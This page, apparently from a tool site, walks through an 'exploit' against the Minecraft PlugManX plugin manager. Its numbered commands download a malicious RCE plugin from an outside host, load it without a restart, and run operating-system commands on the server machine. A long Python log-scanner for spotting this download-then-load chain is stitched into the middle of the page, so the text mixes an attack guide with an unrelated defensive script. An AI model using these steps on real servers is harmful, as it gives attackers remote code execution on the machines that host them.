Plugman X

PluginManager (PlugManX) is a simple plugin manager. The problem with it is that it lets plugins be downloaded from unofficial sites.

How the exploit works

The exploit relies on the /plugman download command: it is used to fetch a malicious plugin onto the server, and that plugin then compromises the server.

How to use the exploit

This exploit requires the PluginManager /plugman download command to be enabled. Then enter the following:

1. Download the malicious plugin

   In this example, a malicious test plugin created by me is attached.

       /pm download direct https://mcptoolspigotrce.mcptool.net/ RCE

2. Load the infected plugin

   Load the plugin without restarting the server:

       /pm load RCE

3. Test the infected plugin

   Check that the plugin has loaded correctly:

       #rce help

4. Run a command on the server operating system

   Commands can now be executed remotely using the #rce command. In this example I use a command to open Notepad on the PC where the server is hosted.

       #rce cmd start notepad.exe
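As a defender-side illustration (added here; it is not part of the original post or of the PlugManX project), the following Python script scans Spigot/Paper-style console log lines for /plugman and /pm download, load, unload and reload commands, flags downloads whose URL host is outside an operator-chosen allowlist, and pairs each download with a later load of the same plugin name by the same actor, which is exactly the sequence the steps above describe. The sample log lines, the allowlist contents and the log-line regular expression are constructed assumptions, not values taken from the page.

```python
import re
from urllib.parse import urlparse

# Constructed sample console lines in the Spigot/Paper "issued server command" format.
# The first two mirror the download-then-load sequence described on the page.
SAMPLE_LOG = """\
[18:02:11] [Server thread/INFO]: Admin issued server command: /pm download direct https://mcptoolspigotrce.mcptool.net/ RCE
[18:02:13] [Server thread/INFO]: Admin issued server command: /pm load RCE
[18:05:01] [Server thread/INFO]: Builder issued server command: /home base
[18:06:22] [Server thread/INFO]: Admin issued server command: /plugman download direct https://github.com/example/plugin/releases/download/v1/plugin.jar Plugin
[18:07:45] [Server thread/INFO]: Mod issued server command: /plugman unload Essentials
"""

# Assumption: hosts the operator has reviewed and trusts. Anything else is flagged "high".
ALLOWED_HOSTS = {"github.com", "www.spigotmc.org"}

# Assumption: log-line shape of a console/player command on a Spigot/Paper server.
CMD_RE = re.compile(
    r"^\[(?P<time>\d{2}:\d{2}:\d{2})\] \[[^\]]+\]: (?P<who>\S+) issued server command: "
    r"/(?:plugman|pm) (?P<sub>download|load|unload|reload)\b(?P<rest>.*)$"
)


def classify(line):
    """Return a finding dict for a plugin-management command line, or None otherwise."""
    m = CMD_RE.match(line)
    if not m:
        return None
    sub = m["sub"]
    args = m["rest"].split()
    host = None
    for tok in args:
        if tok.startswith(("http://", "https://")):
            host = urlparse(tok).hostname
            break
    # Heuristic plugin name: last argument for download (the page's "... <url> RCE"),
    # first argument for load/unload/reload.
    name = (args[-1] if sub == "download" else args[0]) if args else None
    if sub == "download":
        severity = "high" if host not in ALLOWED_HOSTS else "medium"
    else:
        severity = "info"
    return {"time": m["time"], "who": m["who"], "sub": sub,
            "host": host, "name": name, "severity": severity}


def scan(text):
    """All plugin-management findings in the given log text, in order."""
    return [f for f in (classify(l) for l in text.splitlines()) if f]


def high_findings(text):
    """Downloads from hosts outside the allowlist."""
    return [f for f in scan(text) if f["severity"] == "high"]


def download_then_load(text):
    """Pair each download with a later load of the same plugin name by the same actor.

    Returns tuples (who, plugin_name, download_time, load_time)."""
    pending = {}
    chains = []
    for f in scan(text):
        key = (f["who"], f["name"])
        if f["sub"] == "download":
            pending[key] = f["time"]
        elif f["sub"] == "load" and key in pending:
            chains.append((f["who"], f["name"], pending.pop(key), f["time"]))
    return chains


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['severity']:6} {f['who']} {f['sub']} {f['name']} host={f['host']}")
    for who, name, t_dl, t_load in download_then_load(SAMPLE_LOG):
        print(f"download-then-load: {who} fetched and loaded '{name}' ({t_dl} -> {t_load})")
```

Feed it a real latest.log (or tail the console) and treat any "high" finding, or any download-then-load pair, as an event to review immediately: a plugin loaded without a restart from an unreviewed host is the whole chain the page walks through. The allowlist and regex are the two things to adapt to your own server's logging and policy.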

Vulnerable versions

All versions of this plugin to date are vulnerable.

Try it yourself

You can download a server with everything you need to test the exploit locally on your PC from this link.
